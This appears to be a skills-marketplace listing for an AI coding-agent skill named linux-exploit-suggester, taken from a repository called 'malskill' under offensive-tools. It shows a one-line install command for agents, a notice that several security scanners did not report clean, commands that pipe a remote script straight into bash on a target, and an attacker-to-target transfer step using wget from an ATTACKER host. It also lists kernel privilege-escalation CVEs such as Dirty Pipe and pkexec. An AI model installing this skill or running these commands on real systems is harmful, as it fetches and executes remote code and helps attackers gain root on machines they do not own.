offensive-tools/linux/linux-exploit-suggester/SKILL.md
Auth/lab ref: Suggest Linux privilege escalation exploits based on kernel version and OS.
npx skillsauth add aeondave/malskill linux-exploit-suggesterInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
Kernel exploit suggester — maps running Linux version to known privesc CVEs.
# Download and run on target
curl -sL https://raw.githubusercontent.com/The-Z-Labs/linux-exploit-suggester/master/linux-exploit-suggester.sh | bash
# Or run locally
bash linux-exploit-suggester.sh
# Specify kernel manually
bash linux-exploit-suggester.sh --kernel 5.4.0
| Flag | Purpose |
|------|---------|
| --kernel VERSION | Override detected kernel |
| --uname STRING | Pass uname -r output |
| -f | More verbose (show all details) |
| --checksec | Check mitigations (NX/SMEP/etc) |
| -g | Show only highly probable exploits |
| --cvelist | Output CVE list |
DirtyCow (CVE-2016-5195) · Dirty Pipe (CVE-2022-0847) · OverlayFS (CVE-2023-0386) · SUID sudo · nmap --interactive · pkexec (CVE-2021-4034)
Full check with mitigation audit:
bash linux-exploit-suggester.sh --checksec -f
Parse output to get CVEs:
bash linux-exploit-suggester.sh --cvelist 2>/dev/null
Transfer to target:
# Attacker
python3 -m http.server 8080
# Target
wget http://ATTACKER:8080/linux-exploit-suggester.sh -O /tmp/les.sh && bash /tmp/les.sh
| File | When to load |
|------|--------------|
| references/ | Exploit compilation and kernel exploit notes |
development
Auth/lab ref: Unicorn Engine CPU-only emulation for shellcode, decryptors, custom VM handlers, instruction tracing, memory hooks, and register-level experiments.
development
Auth/lab ref: Renode board and SoC simulation for MCU/RTOS firmware, UART/GPIO/peripheral modeling, GDB remote debugging, REPL platforms, and RESC scripts.
development
Auth/lab ref: Qiling OS-layer binary emulation for PE/ELF/Mach-O/UEFI/shellcode with rootfs, syscall/API hooks, filesystem mapping, and runtime patching.
databases
Auth/lab ref: QEMU user-mode and full-system emulation for cross-arch binaries, firmware, kernels, disks, serial consoles, networking, and GDB stubs.